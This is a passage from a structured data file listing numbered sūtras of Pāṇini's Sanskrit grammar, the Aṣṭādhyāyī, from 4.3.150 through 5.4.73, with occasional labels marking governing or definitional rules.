तिलयवाभ्याम्","4.3.150::द्व्यचश्छन्दसि","4.3.151::नोत्वद्वर्ध्रबिल्वात्","4.3.152::तालादिभ्योऽण्","4.3.153::जातरूपेभ्यः परिमाणे","4.3.154::प्राणिरजतादिभ्योऽञ्","4.3.155::ञितश्च तत्प्रत्ययात्","4.3.156::क्रीतवत् परिमाणात्","4.3.157::उष्ट्राद्वुञ्","4.3.158::उमोर्णयोर्वा","4.3.159::एण्या ढञ्","4.3.160::गोपयसोर्यत्","4.3.161::द्रोश्च","4.3.162::माने वयः","4.3.163::फले लुक्","4.3.164::प्लक्षादिभ्योऽण्","4.3.165::जम्ब्वा वा","4.3.166::लुप् च","4.3.167::हरीतक्यादिभ्यश्च","4.3.168::कंसीयपरशव्ययोर्यञञौ लुक् च","4.4.1:अधिकारः:प्राग्वहतेष्ठक्","4.4.2::तेन दीव्यति खनति जयति जितम्","4.4.3::संस्कृतम्","4.4.4::कुलत्थकोपधादण्","4.4.5::तरति","4.4.6::गोपुच्छाट्ठञ्","4.4.7::नौद्व्यचष्ठन्","4.4.8::चरति","4.4.9::आकर्षात् ष्ठल्","4.4.10::पर्पादिभ्यः ष्ठन्","4.4.11::श्वगणाट्ठञ्च","4.4.12::वेतनादिभ्यो जीवति","4.4.13::वस्नक्रयविक्रयाट्ठन्","4.4.14::आयुधाच्छ च","4.4.15::हरत्युत्सङ्गादिभ्यः","4.4.16::भस्त्राऽऽदिभ्यः ष्ठन्","4.4.17::विभाषा विवधवीवधात्","4.4.18::अण् कुटिलिकायाः","4.4.19::निर्वृत्तेऽक्षद्यूतादिभ्यः","4.4.20::क्त्रेर्मम् नित्यं","4.4.21::अपमित्ययाचिताभ्यां कक्कनौ","4.4.22::संसृष्टे","4.4.23::चूर्णादिनिः","4.4.24::लवणाल्लुक्","4.4.25::मुद्गादण्","4.4.26::व्यञ्जनैरुपसिक्ते","4.4.27::ओजस्सहोऽम्भसा वर्तते","4.4.28::तत् प्रत्यनुपूर्वमीपलोमकूलम्","4.4.29::परिमुखं च","4.4.30::प्रयच्छति गर्ह्यम्","4.4.31::कुसीददशैकादशात् ष्ठन्ष्ठचौ","4.4.32::उञ्छति","4.4.33::रक्षति","4.4.34::शब्ददर्दुरं करोति","4.4.35::पक्षिमत्स्यमृगान् हन्ति","4.4.36::परिपन्थं च तिष्ठति","4.4.37::माथोत्तरपदपदव्यनुपदं धावति","4.4.38::आक्रन्दाट्ठञ्च","4.4.39::पदोत्तरपदं गृह्णाति","4.4.40::प्रतिकण्ठार्थललामं च","4.4.41::धर्मं चरति","4.4.42::प्रतिपथमेति ठंश्च","4.4.43::समवायान् समवैति","4.4.44::परिषदो ण्यः","4.4.45::सेनाया वा","4.4.46::संज्ञायां ललाटकुक्कुट्यौ पश्यति","4.4.47::तस्य धर्म्यम्","4.4.48::अण् महिष्यादिभ्यः","4.4.49::ऋतोऽञ्","4.4.50::अवक्रयः","4.4.51::तदस्य पण्यम्","4.4.52::लवणाट्ठञ्","4.4.53::किशरादिभ्यः ष्ठन्","4.4.54::शलालुनोऽन्यतरस्याम्","4.4.55::शिल्पम्","4.4.56::मड्डुकझर्झरादणन्यतरस्याम्","4.4.57::प्रहरणम्","4.4.58::परश्वधाट्ठञ्च","4.4.59::शक्तियष्ट्योरीकक्","4.4.60::अस्तिनास्तिदिष्टं मतिः","4.4.61::शीलम्","4.4.62::छत्रादिभ्यो णः","4.4.63::कर्माध्ययने वृत्तम्","4.4.64::बह्वच्पूर्वपदाट्ठच्","4.4.65::हितं भक्षाः","4.4.66::तदस्मै दीयते नियुक्तम्","4.4.67::श्राणामांसौदनाट्टिठन्","4.4.68::भक्तादणन्यतरस्याम्","4.4.69::तत्र नियुक्तः","4.4.70::अगारान्ताट्ठन्","4.4.71::अध्यायिन्यदेशकालात्","4.4.72::कठिनान्तप्रस्तारसंस्थानेषु व्यवहरति","4.4.73::निकटे वसति","4.4.74::आवसथात् ष्ठल्","4.4.75:अधिकारः:प्राग्घिताद्यत्","4.4.76::तद्वहति रथयुगप्रासङ्गम्","4.4.77::धुरो यड्ढकौ","4.4.78::खः सर्वधुरात्","4.4.79::एकधुराल्लुक् च","4.4.80::शकटादण्","4.4.81::हलसीराट्ठक्","4.4.82::संज्ञायां जन्याः","4.4.83::विध्यत्यधनुषा","4.4.84::धनगणं लब्धा","4.4.85::अन्नाण्णः","4.4.86::वशं गतः","4.4.87::पदमस्मिन् दृश्यम्","4.4.88::मूलमस्याबर्हि","4.4.89::संज्ञायां धेनुष्या","4.4.90::गृहपतिना संयुक्ते ञ्यः","4.4.91::नौवयोधर्मविषमूलमूलसीतातुलाभ्यस्तार्यतुल्यप्राप्यवध्यानाम्यसमसमितसम्मितेषु","4.4.92::धर्मपथ्यर्थन्यायादनपेते","4.4.93::छन्दसो निर्मिते","4.4.94::उरसोऽण् च","4.4.95::हृदयस्य प्रियः","4.4.96::बन्धने चर्षौ","4.4.97::मतजनहलात् करणजल्पकर्षेषु","4.4.98::तत्र साधुः","4.4.99::प्रतिजनादिभ्यः खञ्","4.4.100::भक्ताण्णः","4.4.101::परिषदो ण्यः","4.4.102::कथाऽऽदिभ्यष्ठक्","4.4.103::गुडादिभ्यष्ठञ्","4.4.104::पथ्यतिथिवसतिस्वपतेर्ढञ्","4.4.105::सभाया यः","4.4.106::ढश्छन्दसि","4.4.107::समानतीर्थे वासी","4.4.108::समानोदरे शयित ओ चोदात्तः","4.4.109::सोदराद्यः","4.4.110::भवे छन्दसि","4.4.111::पाथोनदीभ्यां ड्यण्","4.4.112::वेशन्तहिमवद्भ्यामण्","4.4.113::स्रोतसो विभाषा ड्यड्ड्यौ","4.4.114::सगर्भसयूथसनुताद्यन्","4.4.115::तुग्राद्घन्","4.4.116::अग्राद्यत्","4.4.117::घच्छौ च","4.4.118::समुद्राभ्राद्घः","4.4.119::बर्हिषि दत्तम्","4.4.120::दूतस्य भागकर्मणी","4.4.121::रक्षोयातूनां हननी","4.4.122::रेवतीजगतीहविष्याभ्यः प्रशस्ये","4.4.123::असुरस्य स्वम्","4.4.124::मायायामण्","4.4.125::तद्वानासामुपधानो मन्त्र इतीष्टकासु लुक् च मतोः","4.4.126::अश्विमानण्","4.4.127::वयस्यासु मूर्ध्नो मतुप्","4.4.128::मत्वर्थे मासतन्वोः","4.4.129::मधोर्ञ च","4.4.130::ओजसोऽहनि यत्खौ","4.4.131::वेशोयशआदेर्भगाद्यल्","4.4.132::ख च","4.4.133::पूर्वैः कृतमिनियौ च","4.4.134::अद्भिः संस्कृतम्","4.4.135::सहस्रेण संमितौ घः","4.4.136::मतौ च","4.4.137::सोममर्हति यः","4.4.138::मये च","4.4.139::मधोः","4.4.140::वसोः समूहे च","4.4.141::नक्षत्राद्घः","4.4.142::सर्वदेवात् तातिल्","4.4.143::शिवशमरिष्टस्य करे","4.4.144::भावे च","5.1.1:अधिकारः:प्राक् क्रीताच्छः","5.1.2::उगवादिभ्योऽत्","5.1.3::कम्बलाच्च संज्ञायाम्","5.1.4::विभाषा हविरपूपादिभ्यः","5.1.5::तस्मै हितम्","5.1.6::शरीरावयवाद्यत्","5.1.7::खलयवमाषतिलवृषब्रह्मणश्च","5.1.8::अजाविभ्यां थ्यन्","5.1.9::आत्मन्विश्वजनभोगोत्तरपदात् खः","5.1.10::सर्वपुरुषाभ्यां णढञौ","5.1.11::माणवचरकाभ्यां खञ्","5.1.12::तदर्थं विकृतेः प्रकृतौ","5.1.13::छदिरुपधिबलेः ढञ्","5.1.14::ऋषभोपानहोर्ञ्यः","5.1.15::चर्म्मणोऽञ्","5.1.16::तदस्य तदस्मिन् स्यादिति","5.1.17::परिखाया ढञ्","5.1.18:अधिकारः:प्राग्वतेष्ठञ्","5.1.19:अधिकारः:आर्हादगोपुच्छसंख्यापरिमाणाट्ठक्","5.1.20::असमासे निष्कादिभ्यः","5.1.21::शताच्च ठन्यतावशते","5.1.22::संख्याया अतिशदन्तायाः कन्","5.1.23::वतोरिड्वा","5.1.24::विंशतित्रिंशद्भ्यां ड्वुन्नसंज्ञायाम्","5.1.25::कंसाट्टिठन्","5.1.26::शूर्पादञन्यतरस्याम्","5.1.27::शतमानविंशतिकसहस्रवसनादण्","5.1.28::अध्यर्धपूर्वद्विगोर्लुगसंज्ञायाम्","5.1.29::विभाषा कार्षापणसहस्राभ्याम्","5.1.30::द्वित्रिपूर्वान्निष्कात्","5.1.31::बिस्ताच्च","5.1.32::विंशतिकात् खः","5.1.33::खार्या ईकन्","5.1.34::पणपादमाषशतादत्","5.1.35::शाणाद्वा","5.1.36::द्वित्रिपूर्वादण् च","5.1.37::तेन क्रीतम्","5.1.38::तस्य निमित्तं संयोगोत्पातौ","5.1.39::गोद्व्यचोरसंख्यापरिमाणाश्वादेर्यत्","5.1.40::पुत्राच्छ च","5.1.41::सर्वभूमिपृथिवीभ्यामणञौ","5.1.42::तस्येश्वरः","5.1.43::तत्र विदित इति च","5.1.44::लोकसर्वलोकाट्ठञ्","5.1.45::तस्य वापः","5.1.46::पात्रात् ष्ठन्","5.1.47::तदस्मिन् वृद्ध्यायलाभशुल्कोपदा दीयते","5.1.48::पूरणार्धाट्ठन्","5.1.49::भागाद्यच्च","5.1.50::तद्धरति वहत्यावहति भाराद्वंशादिभ्यः","5.1.51::वस्नद्रव्याभ्यां ठन्कनौ","5.1.52::सम्भवत्यवहरति पचति","5.1.53::आढकाचितपात्रात् खोऽन्यतरयाम्","5.1.54::द्विगोष्ठंश्च","5.1.55::कुलिजाल्लुक्खौ च","5.1.56::सोऽस्यांशवस्नभृतयः","5.1.57::तदस्य परिमाणम्","5.1.58::संख्यायाः संज्ञासंघसूत्राध्ययनेषु","5.1.59::पङ्क्तिविंशतित्रिंशत्चत्वारिंशत्पञ्चाशत्षष्टिसप्तत्यशीतिनवतिशतम्","5.1.60::पञ्चद्दशतौ वर्गे वा","5.1.61::सप्तनोऽञ् छन्दसि","5.1.62::त्रिंशच्चत्वारिंशतोर्ब्राह्मणे संज्ञायां डण्","5.1.63::तद् अर्हति","5.1.64::छेदादिभ्यो नित्यम्","5.1.65::शीर्षच्छेदाद्यच्च","5.1.66::दण्डादिभ्यः","5.1.67::छन्दसि च","5.1.68::पात्राद्घंश्च","5.1.69::कडङ्गरदक्षिणाच्छ च","5.1.70::स्थालीबिलात्","5.1.71::यज्ञर्त्विग्भ्यां घखञौ","5.1.72::पारायणतुरायणचान्द्रायणं वर्तयति","5.1.73::संशयमापन्नः","5.1.74::योजनं गच्छति","5.1.75::पथः ष्कन्","5.1.76::पन्थो ण नित्यम्","5.1.77::उत्तरपथेनाहृतं च","5.1.78:अधिकारः:कालात्","5.1.79::तेन निर्वृत्तम्","5.1.80::तमधीष्टो भृतो भूतो भावी","5.1.81::मासाद्वयसि यत्खञौ","5.1.82::द्विगोर्यप्","5.1.83::षण्मासाण्ण्यच्च","5.1.84::अवयसि ठंश्च","5.1.85::समायाः खः","5.1.86::द्विगोर्वा","5.1.87::रात्र्यहस्संवत्सराच्च","5.1.88::वर्षाल्लुक् च","5.1.89::चित्तवति नित्यम्","5.1.90::षष्टिकाः षष्टिरात्रेण पच्यन्ते","5.1.91::वत्सरान्ताच्छश्छन्दसि","5.1.92::सम्परिपूर्वात् ख च","5.1.93::तेन परिजय्यलभ्यकार्यसुकरम्","5.1.94::तदस्य ब्रह्मचर्यम्","5.1.95::तस्य च दक्षिणा यज्ञाख्येभ्यः","5.1.96::तत्र च दीयते कार्यं भववत्","5.1.97::व्युष्टादिभ्योऽण्","5.1.98::तेन यथाकथाचहस्ताभ्यां णयतौ","5.1.99::सम्पादिनि","5.1.100::कर्मवेषाद्यत्","5.1.101::तस्मै प्रभवति संतापादिभ्यः","5.1.102::योगाद्यच्च","5.1.103::कर्मण उकञ्","5.1.104::समयस्तदस्य प्राप्तम्","5.1.105::ऋतोरण्","5.1.106::छन्दसि घस्","5.1.107::कालाद्यत्","5.1.108::प्रकृष्टे ठञ्","5.1.109::प्रयोजनम्","5.1.110::विशाखाऽऽषाढादण् मन्थदण्डयोः","5.1.111::अनुप्रवचनादिभ्यश्छः","5.1.112::समापनात् सपूर्वपदात्","5.1.113::ऐकागारिकट् चौरे","5.1.114::आकालिकडाद्यन्तवचने","5.1.115::तेन तुल्यं क्रिया चेद्वतिः","5.1.116::तत्र तस्येव","5.1.117::तदर्हम्","5.1.118::उपसर्गाच्छन्दसि धात्वर्थे","5.1.119::तस्य भावस्त्वतलौ","5.1.120:अधिकारः:आ च त्वात्","5.1.121::न नञ्पूर्वात्तत्पुरुषादचतुरसंगतलवणवटयुधकतरसलसेभ्यः","5.1.122::पृथ्वादिभ्य इमनिज्वा","5.1.123::वर्णदृढादिभ्यः ष्यञ् च","5.1.124::गुणवचनब्राह्मणादिभ्यः कर्मणि च","5.1.125::स्तेनाद्यन्नलोपश्च","5.1.126::सख्युर्यः","5.1.127::कपिज्ञात्योर्ढक्","5.1.128::पत्यन्तपुरोहितादिभ्यो यक्","5.1.129::प्राणभृज्जातिवयोवचनोद्गात्रादिभ्योऽञ्","5.1.130::हायनान्तयुवादिभ्योऽण्","5.1.131::इगन्ताच्च लघुपूर्वात्","5.1.132::योपधाद्गुरूपोत्तमाद्वुञ्","5.1.133::द्वंद्वमनोज्ञादिभ्यश्च","5.1.134::गोत्रचरणाच्श्लाघाऽत्याकारतदवेतेषु","5.1.135::होत्राभ्यश्छः","5.1.136::ब्रह्मणस्त्वः","5.2.1::धान्यानां भवने क्षेत्रे खञ्","5.2.2::व्रीहिशाल्योर्ढक्","5.2.3::यवयवकषष्टिकादत्","5.2.4::विभाषा तिलमाषोमाभङ्गाऽणुभ्यः","5.2.5::सर्वचर्मणः कृतः खखञौ","5.2.6::यथामुखसंमुखस्य दर्शनः खः","5.2.7::तत्सर्वादेः पथ्यङ्गकर्मपत्रपात्रं व्याप्नोति","5.2.8::आप्रपदं प्राप्नोति","5.2.9::अनुपदसर्वान्नायानयं बद्धाभक्षयतिनेयेषु","5.2.10::परोवरपरम्परपुत्रपौत्रमनुभवति","5.2.11::अवारपारात्यन्तानुकामं गामी","5.2.12::समांसमां विजायते","5.2.13::अद्यश्वीनाऽवष्टब्धे","5.2.14::आगवीनः","5.2.15::अनुग्वलंगामी","5.2.16::अध्वनो यत्खौ","5.2.17::अभ्यमित्राच्छ च","5.2.18::गोष्ठात् खञ् भूतपूर्वे","5.2.19::अश्वस्यैकाहगमः","5.2.20::शालीनकौपीने अधृष्टाकार्ययोः","5.2.21::व्रातेन जीवति","5.2.22::साप्तपदीनं सख्यम्","5.2.23::हैयंगवीनं संज्ञायाम्","5.2.24::तस्य पाकमूले पील्वदिकर्णादिभ्यः कुणब्जाहचौ","5.2.25::पक्षात्तिः","5.2.26::तेन वित्तश्चुञ्चुप्चणपौ","5.2.27::विनञ्भ्यां नानाञौ नसह","5.2.28::वेः शालच्छङ्कटचौ","5.2.29::सम्प्रोदश्च कटच्","5.2.30::अवात् कुटारच्च","5.2.31::नते नासिकायाः संज्ञायां टीटञ्नाटज्भ्राटचः","5.2.32::नेर्बिडज्बिरीसचौ","5.2.33::इनच्पिटच्चिकचि च","5.2.34::उपाधिभ्यां त्यकन्नासन्नारूढयोः","5.2.35::कर्मणि घटोऽठच्","5.2.36::तदस्य संजातं तारकाऽऽदिभ्य इतच्","5.2.37::प्रमाणे द्वयसज्दघ्नञ्मात्रचः","5.2.38::पुरुषहस्तिभ्यामण् च","5.2.39::यद्तदेतेभ्यः परिमाणे वतुप्","5.2.40::किमिदंभ्यां वो घः","5.2.41::किमः संख्यापरिमाणे डति च","5.2.42::संख्याया अवयवे तयप्","5.2.43::द्वित्रिभ्यां तयस्यायज्वा","5.2.44::उभादुदात्तो नित्यम्","5.2.45::तदस्मिन्नधिकमिति दशान्ताड्डः","5.2.46::शदन्तविंशतेश्च","5.2.47::संख्याया गुणस्य निमाने मयट्","5.2.48::तस्य पूरणे डट्","5.2.49::नान्तादसंख्याऽऽदेर्मट्","5.2.50::थट् च च्छन्दसि","5.2.51::षट्कतिकतिपयचतुरां थुक्","5.2.52::बहुपूगगणसंघस्य तिथुक्","5.2.53::वतोरिथुक्","5.2.54::द्वेस्तीयः","5.2.55::त्रेः सम्प्रसारणम् च","5.2.56::विंशत्यादिभ्यस्तमडन्यतरस्याम्","5.2.57::नित्यं शतादिमासार्धमाससंवत्सराच्च","5.2.58::षष्ट्यादेश्चासंख्याऽऽदेः","5.2.59::मतौ च्छः सूक्तसाम्नोः","5.2.60::अध्यायानुवाकयोर्लुक्","5.2.61::विमुक्तादिभ्योऽण्","5.2.62::गोषदादिभ्यो वुन्","5.2.63::तत्र कुशलः पथः","5.2.64::आकर्षादिभ्यः कन्","5.2.65::धनहिरण्यात् कामे","5.2.66::स्वाङ्गेभ्यः प्रसिते","5.2.67::उदराट्ठगाद्यूने","5.2.68::सस्येन परिजातः","5.2.69::अंशं हारी","5.2.70::तन्त्रादचिरापहृते","5.2.71::ब्राह्मणकोष्णिके संज्ञायाम्","5.2.72::शीतोष्णाभ्यां कारिणि","5.2.73::अधिकम्","5.2.74::अनुकाभिकाभीकः कमिता","5.2.75::पार्श्वेनान्विच्छति","5.2.76::अयःशूलदण्डाजिनाभ्यां ठक्ठञौ","5.2.77::तावतिथं ग्रहणमिति लुग्वा","5.2.78::स एषां ग्रामणीः","5.2.79::शृङ्खलमस्य बन्धनं करभे","5.2.80::उत्क उन्मनाः","5.2.81::कालप्रयोजनाद्रोगे","5.2.82::तदस्मिन्नन्नं प्राये संज्ञायाम्","5.2.83::कुल्माषादञ्","5.2.84::श्रोत्रियंश्छन्दोऽधीते","5.2.85::श्राद्धमनेन भुक्तमिनिठनौ","5.2.86::पूर्वादिनिः","5.2.87::सपूर्वाच्च","5.2.88::इष्टादिभ्यश्च","5.2.89::छन्दसि परिपन्थिपरिपरिणौ पर्यवस्थातरि","5.2.90::अनुपद्यन्वेष्टा","5.2.91::साक्षाद्द्रष्टरि संज्ञायाम्","5.2.92::क्षेत्रियच् परक्षेत्रे चिकित्स्यः","5.2.93::'इन्द्रियमिन्द्रलिंगमिन्द्रदृष्टमिन्द्रसृष्टमिन्द्रजुष्टम्इन्द्रदत्तमिति वा","5.2.94::तदस्यास्त्यस्मिन्निति मतुप्","5.2.95::रसादिभ्यश्च","5.2.96::प्राणिस्थादातो लजन्यतरस्याम्","5.2.97::सिध्मादिभ्यश्च","5.2.98::वत्सांसाभ्यां कामबले","5.2.99::फेनादिलच् च","5.2.100::लोमादिपामादिपिच्छादिभ्यः शनेलचः","5.2.101::प्रज्ञाश्रद्धाऽर्चावृत्तिभ्यो णः","5.2.102::तपःसहस्राभ्यां विनीनी","5.2.103::अण् च","5.2.104::सिकताशर्कराभ्यां च","5.2.105::देशे लुबिलचौ च","5.2.106::दन्त उन्नत उरच्","5.2.107::ऊषसुषिमुष्कमधो रः","5.2.108::द्युद्रुभ्यां मः","5.2.109::केशाद्वोऽन्यतरस्याम्","5.2.110::गाण्ड्यजगात् संज्ञायाम्","5.2.111::काण्डाण्डादीरन्नीरचौ","5.2.112::रजःकृष्यासुतिपरिषदो वलच्","5.2.113::दन्तशिखात् संज्ञायाम्","5.2.114::ज्योत्स्नातमिस्राशृङ्गिणोजस्विन्नूर्जस्वलगोमिन्मलिनमलीमसाः","5.2.115::अत इनिठनौ","5.2.116::व्रीह्यादिभ्यश्च","5.2.117::तुन्दादिभ्य इलच् च","5.2.118::एकगोपूर्वाट्ठञ् नित्यम्","5.2.119::शतसहस्रान्ताच्च निष्कात्","5.2.120::रूपादाहतप्रशंसयोरप्","5.2.121::अस्मायामेधास्रजो विनिः","5.2.122::बहुलं छन्दसि","5.2.123::ऊर्णाया युस्","5.2.124::वाचो ग्मिनिः","5.2.125::आलजाटचौ बहुभाषिणि","5.2.126::स्वामिन्नैश्वर्ये","5.2.127::अर्शआदिभ्योऽच्","5.2.128::द्वंद्वोपतापगर्ह्यात् प्राणिस्थादिनिः","5.2.129::वातातिसाराभ्यां कुक् च","5.2.130::वयसि पूरणात्","5.2.131::सुखादिभ्यश्च","5.2.132::धर्मशीलवर्णान्ताच्च","5.2.133::हस्ताज्जातौ","5.2.134::वर्णाद्ब्रह्मचारिणि","5.2.135::पुष्करादिभ्यो देशे","5.2.136::बलादिभ्यो मतुबन्यतरस्याम्","5.2.137::संज्ञायां मन्माभ्याम्.ह्","5.2.138::कंशंभ्यां बभयुस्तितुतयसः","5.2.139::तुन्दिवलिवटेर्भः","5.2.140::अहंशुभमोर्युस्","5.3.1:संज्ञा:प्राग्दिशो विभक्तिः","5.3.2:अधिकारः:किंसर्वनामबहुभ्योऽद्व्यादिभ्यः","5.3.3::इदम इश्","5.3.4::एतेतौ रथोः","5.3.5::एतदोऽश्","5.3.6::सर्वस्य सोऽन्यतरस्यां दि","5.3.7::पञ्चम्यास्तसिल्","5.3.8::तसेश्च","5.3.9::पर्यभिभ्यां च","5.3.10::सप्तम्यास्त्रल्","5.3.11::इदमो हः","5.3.12::किमोऽत्","5.3.13::वा ह च च्छन्दसि","5.3.14::इतराभ्योऽपि दृश्यन्ते","5.3.15::सर्वैकान्यकिंयत्तदः काले दा","5.3.16::इदमो र्हिल्","5.3.17::अधुना","5.3.18::दानीं च","5.3.19::तदो दा च","5.3.20::तयोर्दार्हिलौ च च्छन्दसि","5.3.21::अनद्यतने र्हिलन्यतरस्याम्","5.3.22::सद्यःपरुत्परार्यैषमःपरेद्यव्यद्यपूर्वेद्युरन्येद्युरन्यतरेद्युरितरेद्युरपरेद्युरधरेद्युरुभयेद्युरुत्तरेद्युः","5.3.23::प्रकारवचने थाल्","5.3.24::इदमस्थमुः","5.3.25::किमश्च","5.3.26::था हेतौ च च्छन्दसि","5.3.27::दिक्शब्देभ्यः सप्तमीपञ्चमीप्रथमाभ्यो दिग्देशकालेष्वस्तातिः","5.3.28::दक्षिणोत्तराभ्यामतसुच्","5.3.29::विभाषा परावराभ्याम्","5.3.30::अञ्चेर्लुक्","5.3.31::उपर्युपरिष्टात्","5.3.32::पश्चात्","5.3.33::पश्च पश्चा च च्छन्दसि","5.3.34::उत्तराधरदक्षिणादातिः","5.3.35::एनबन्यतरस्यामदूरेऽपञ्चम्याः","5.3.36::दक्षिणादाच्","5.3.37::आहि च दूरे","5.3.38::उत्तराच्च","5.3.39::पूर्वाधरावराणामसि पुरधवश्चैषाम्","5.3.40::अस्ताति च","5.3.41::विभाषाऽवरस्य","5.3.42::संख्याया विधाऽर्थे धा","5.3.43::अधिकरणविचाले च","5.3.44::एकाद्धो ध्यमुञन्यारयाम्","5.3.45::द्वित्र्योश्च धमुञ्","5.3.46::एधाच्च","5.3.47::याप्ये पाशप्","5.3.48::पूरणाद्भागे तीयादन्","5.3.49::प्रागेकादशभ्योऽच्छन्दसि","5.3.50::षष्ठाष्टमाभ्यां ञ च","5.3.51::मानपश्वङ्गयोः कन्लुकौ च","5.3.52::एकादाकिनिच्चासहाये","5.3.53::भूतपूर्वे चरट्","5.3.54::षष्ठ्या रूप्य च","5.3.55::अतिशायने तमबिष्ठनौ","5.3.56::तिङश्च","5.3.57::द्विवचनविभज्योपपदे तरबीयसुनौ","5.3.58::अजादी गुणवचनादेव","5.3.59::तुश्छन्दसि","5.3.60::प्रशस्यस्य श्रः","5.3.61::ज्य च","5.3.62::वृद्धस्य च","5.3.63::अन्तिकबाढयोर्नेदसाधौ","5.3.64::युवाल्पयोः कनन्यतरस्याम्","5.3.65::विन्मतोर्लुक्","5.3.66::प्रशंसायां रूपप्","5.3.67::ईषदसमाप्तौ कल्पब्देश्यदेशीयरः","5.3.68::विभाषा सुपो बहुच् पुरस्तात्तु","5.3.69::प्रकारवचने जातीयर्।","5.3.70:अधिकारः:प्रागिवात्कः","5.3.71::अव्ययसर्वनाम्नामकच् प्राक् टेः","5.3.72::कस्य च दः","5.3.73::अज्ञाते","5.3.74::कुत्सिते","5.3.75::संज्ञायां कन्","5.3.76::अनुकम्पायाम्","5.3.77::नीतौ च तद्युक्तात्","5.3.78::बह्वचो मनुष्यनाम्नष्ठज्वा","5.3.79::घनिलचौ च","5.3.80::प्राचामुपादेरडज्वुचौ च","5.3.81::जातिनाम्नः कन्","5.3.82::अजिनान्तस्योत्तरपदलोपश्च","5.3.83::ठाजादावूर्ध्वं द्वितीयादचः","5.3.84::शेवलसुपरिविशालवरुणार्यमादीनां तृतीयात्","5.3.85::अल्पे","5.3.86::ह्रस्वे","5.3.87::संज्ञायां कन्","5.3.88::कुटीशमीशुण्डाभ्यो रः","5.3.89::कुत्वा डुपच्","5.3.90::कासूगोणीभ्यां ष्टरच्","5.3.91::वत्सोक्षाश्वर्षभेभ्यश्च तनुत्वे","5.3.92::किंयत्तदो निर्द्धारणे द्वयोरेकस्य डतरच्","5.3.93::वा बहूनां जातिपरिप्रश्ने डतमच्","5.3.94::एकाच्च प्राचाम्","5.3.95::अवक्षेपणे कन्","5.3.96::इवे प्रतिकृतौ","5.3.97::संज्ञायां च","5.3.98::लुम्मनुष्ये","5.3.99::जीविकाऽर्थे चापण्ये","5.3.100::देवपथादिभ्यश्च","5.3.101::वस्तेर्ढञ्","5.3.102::शिलाया ढः","5.3.103::शाखाऽऽदिभ्यो यत्","5.3.104::द्रव्यं च भव्ये","5.3.105::कुशाग्राच्छः","5.3.106::समासाच्च तद्विषयात्","5.3.107::शर्कराऽऽदिभ्योऽण्","5.3.108::अङ्गुल्यादिभ्यष्ठक्","5.3.109::एकशालायाष्ठजन्यतरस्याम्","5.3.110::कर्कलोहितादीकक्","5.3.111::प्रत्नपूर्वविश्वेमात्थाल् छन्दसि","5.3.112::पूगाञ्ञ्योऽग्रामणीपूर्वात्","5.3.113::व्रातच्फञोरस्त्रियाम्","5.3.114::आयुधजीविसंघाञ्ञ्यड्वाहीकेष्वब्राह्मणराजन्यात्","5.3.115::वृकाट्टेण्यण्","5.3.116::दामन्यादित्रिगर्तषष्ठाच्छः","5.3.117::पर्श्वादियौधेयादिभ्यामणञौ","5.3.118::'अभिजिद्विदभृच्छालावच्छिखावच्छमीवदूर्णावच्छ्रुमदणो यञ्","5.3.119:संज्ञा:ञ्य्आदयस्तद्राजाः","5.4.1::पादशतस्य संख्याऽऽदेर्वीप्सायां वुन् लोपश्च","5.4.2::दण्डव्यवसर्गयोश्च","5.4.3::स्थूलादिभ्यः प्रकारवचने कन्","5.4.4::अनत्यन्तगतौ क्तात्","5.4.5::न सामिवचने","5.4.6::बृहत्या आच्छादने","5.4.7::अषडक्षाशितङ्ग्वलंकर्मालम्पुरुषाध्युत्तरपदात् खः","5.4.8::विभाषा अञ्चेरदिक्स्त्रियाम्","5.4.9::जात्यन्ताच्छ बन्धुनि","5.4.10::स्थानान्ताद्विभाषा सस्थानेनेति चेत्","5.4.11::किमेत्तिङव्ययघादाम्वद्रव्यप्रकर्षे","5.4.12::अमु च च्छन्दसि","5.4.13::अनुगादिनष्ठक्","5.4.14::णचः स्त्रियामञ्","5.4.15::अणिनुणः","5.4.16::विसारिणो मत्स्ये","5.4.17::संख्यायाः क्रियाऽभ्यावृत्तिगणने कृत्वसुच्","5.4.18::द्वित्रिचतुर्भ्यः सुच्","5.4.19::एकस्य सकृच्च","5.4.20::विभाषा बहोर्धाऽविप्रकृष्टकाले","5.4.21::तत्प्रकृतवचने मयट्","5.4.22:अतिदेशः:समूहवच्च बहुषु","5.4.23::अनन्तावसथेतिहभेषजाञ्ञ्यः","5.4.24::देवतान्तात्तादर्थ्ये यत्","5.4.25::पादार्घाभ्यां च","5.4.26::अतिथेर्ञ्यः","5.4.27::देवात्तल्","5.4.28::अवेः कः","5.4.29::यावादिभ्यः कन्","5.4.30::लोहितान्मणौ","5.4.31::वर्णे चानित्ये","5.4.32::रक्ते","5.4.33::कालाच्च","5.4.34::विनयादिभ्यष्ठक्","5.4.35::वाचो व्याहृतार्थायाम्","5.4.36::तद्युक्तात् कर्मणोऽण्","5.4.37::ओषधेरजातौ","5.4.38::प्रज्ञादिभ्यश्च","5.4.39::मृदस्तिकन्","5.4.40::सस्नौ प्रशंसायाम्","5.4.41::वृकज्येष्ठाभ्यां तिल्तातिलौ च च्छन्दसि","5.4.42::बह्वल्पार्थाच्छस् कारकादन्यतरस्याम्","5.4.43::संख्यैकवचनाच्च वीप्सायाम्","5.4.44::प्रतियोगे पञ्चम्यास्तसिः","5.4.45::अपादाने चाहीयरुहोः","5.4.46::अतिग्रहाव्यथनक्षेपेष्वकर्तरि तृतीयायाः","5.4.47::हीयमानपापयोगाच्च","5.4.48::षष्ठ्या व्याश्रये","5.4.49::रोगाच्चापनयने","5.4.50::अभूततद्भावे कृभ्वस्तियोगे सम्पद्यकर्तरि च्विः","5.4.51::अरुर्मनश्चक्षुश्चेतोरहोरजसां लोपश्च","5.4.52::विभाषा साति कार्त्स्न्ये","5.4.53::अभिविधौ सम्पदा च","5.4.54::तदधीनवचने","5.4.55::देये त्रा च","5.4.56::देवमनुष्यपुरुषमर्त्येभ्यो द्वितीयासप्तम्योर्बहुलम्","5.4.57::अव्यक्तानुकरणाद्द्व्यजवरार्धादनितौ डाच्","5.4.58::कृञो द्वितीयतृतीयशम्बबीजात् कृषौ","5.4.59::संख्यायाश्च गुणान्तायाः","5.4.60::समयाच्च यापनायाम्","5.4.61::सपत्त्रनिष्पत्रादतिव्यथने","5.4.62::निष्कुलान्निष्कोषणे","5.4.63::सुखप्रियादानुलोम्ये","5.4.64::दुःखात् प्रातिलोम्ये","5.4.65::शूलात् पाके","5.4.66::सत्यादशपथे","5.4.67::मद्रात् परिवापणे","5.4.68:अधिकारः:समासान्ताः","5.4.69::न पूजनात्","5.4.70::किमः क्षेपे","5.4.71::नञस्तत्पुरुषात्","5.4.72::पथो विभाषा","5.4.73::बहुव्रीहौ संख्येये 